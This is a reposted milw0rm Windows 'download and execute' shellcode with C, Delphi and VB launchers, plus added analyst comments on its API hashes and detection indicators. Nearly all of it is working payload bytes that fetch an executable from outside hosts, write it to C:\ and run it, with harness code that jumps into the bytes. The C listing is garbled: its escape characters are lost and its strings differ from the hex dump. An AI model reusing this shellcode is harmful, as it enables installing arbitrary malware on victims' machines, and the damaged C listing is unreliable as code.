win32 download & exec shellcode 203 bytes


milw0rm 上的 win32 download & exec shellcode(下面是十六进制形式的原始字节;其中内嵌的落地文件路径和下载 URL 与后面各语言版本中的并不相同):

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC++:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

/*
 * Byte string holding a 32-bit x86 Windows payload (202 bytes of code in the
 * hex listing) followed by the download URL as the final literal; the string's
 * implicit terminating NUL ends the URL.
 *
 * Analyst notes, read off the bytes below:
 *  - 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 is the ASCII text "urlmon.dll".
 *  - 43 3A 5C 55 2E 65 78 65 00 is the ASCII text "C:\U.exe", presumably the
 *    local path the fetched file is written to and then run from.
 *  - 64 03 40 30 references fs:[30h]; this looks like the usual PEB walk used
 *    to locate kernel32 without an import table (confirm by disassembly).
 *  - C1 CB 0D is `ror ebx, 0Dh`; the dwords loaded after each BF opcode
 *    (EC0E4E8E, 702F1A36, 0E8AFE98, 73E2D87E) match the widely published
 *    ROR-13 export-name hashes for LoadLibraryA, URLDownloadToFileA, WinExec
 *    and ExitProcess. These constants and the embedded strings are practical
 *    signature material for static detection.
 *
 * NOTE(review): as printed on this page the literals read "xEB", "x54", ...
 * with no escape characters, so the array holds plain text rather than the
 * byte values shown in the hex dump; the escapes appear to have been lost
 * when the page was extracted.
 */
unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
/* Download URL, stored as data directly after the code bytes. */
"http://h0nest.org/1.exe";

/*
 * Test harness: prints a banner, then transfers control to the sh4llcode
 * array by treating its address as a function pointer. Nothing is returned
 * explicitly and no error handling is present.
 *
 * NOTE(review): the array is an initialised global, so it presumably sits in
 * a data section; with DEP/NX enforced the call would typically fault rather
 * than run. Execution from a non-image data page is also a common behavioural
 * detection point.
 */
int main()
{

 void (*c0de)();
 /* NOTE(review): the inner quotes and the trailing "n" look like escape
    sequences whose backslashes were lost on this page; as printed the line
    is not a valid string literal. */
 printf("Win32 "download & exec shellcode"n");
 /* Stores the array's address into the function pointer through an int-sized
    write, so only sizeof(int) bytes of the pointer are set; this relies on a
    target where int and code pointers have the same width. */
 *(int*)&c0de = sh4llcode;
 /* Indirect call into the data array. */
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

// Delphi harness for the same payload: a 230-byte typed constant (202 bytes
// of code followed by a NUL-terminated URL) whose address is assigned to a
// procedure variable and called.
//
// Analyst notes, read off the bytes below:
//  - $75 $72 $6C $6D $6F $6E $2E $64 $6C $6C $00 is the ASCII text "urlmon.dll".
//  - $43 $3A $5C $55 $2E $65 $78 $65 $00 is the ASCII text "C:\U.exe",
//    presumably the path the fetched file is written to and run from.
//  - $C1 $CB $0D is `ror ebx, 0Dh`; the dwords after each $BF opcode match the
//    widely published ROR-13 export-name hashes for LoadLibraryA,
//    URLDownloadToFileA, WinExec and ExitProcess (confirm by disassembly).
program download;

const

ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
// Parameterless procedure variable used to call into the byte array.
ShellCodeProc: procedure;

begin
// Points the procedure variable at the constant's storage and calls it.
// NOTE(review): a typed constant presumably lives in a data section, so with
// DEP/NX enforced this call would typically fault; confirm for the compiler
// and target in use.
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
' Imports user32!CallWindowProcA. In this module it is not used for window
' subclassing: Sub Main passes a raw buffer address as lpPrevWndFunc, so the
' API acts as a generic "call this address" trampoline. A VB/VBA module that
' declares CallWindowProc and feeds it VarPtr(...) is a useful static
' indicator when triaging samples.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Entry point: builds the payload as a Variant array of byte values, copies it
' into a Byte array, then has CallWindowProc call the address of the first
' element with all four remaining arguments set to zero.
'
' Analyst notes, read off the values below:
'  - &H75 &H72 &H6C &H6D &H6F &H6E &H2E &H64 &H6C &H6C &H0 is "urlmon.dll".
'  - &H43 &H3A &H5C &H55 &H2E &H65 &H78 &H65 &H0 is "C:\U.exe", presumably the
'    path the fetched file is written to and run from.
'  - The trailing bytes from &H68 &H74 &H74 &H70 onward are the NUL-terminated
'    ASCII URL "http://www.0x4f.cn/test.exe".
Sub Main()
' Declared without a type, so this is a Variant; it receives the Array() result.
Dim ShellCode
' Contiguous byte buffer that the payload is copied into before the call.
Dim download() As Byte
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

' Size the Byte array to the same upper bound as the Variant array.
ReDim download(UBound(ShellCode))

' Element-by-element copy from Variant values to raw bytes. The loop counter i
' is never declared in this procedure.
For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

' Passes the buffer's address as the "window procedure" to call.
' NOTE(review): the buffer is ordinary array storage, so with DEP/NX enforced
' for the process this call would typically fault; confirm for the host in use.
CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub
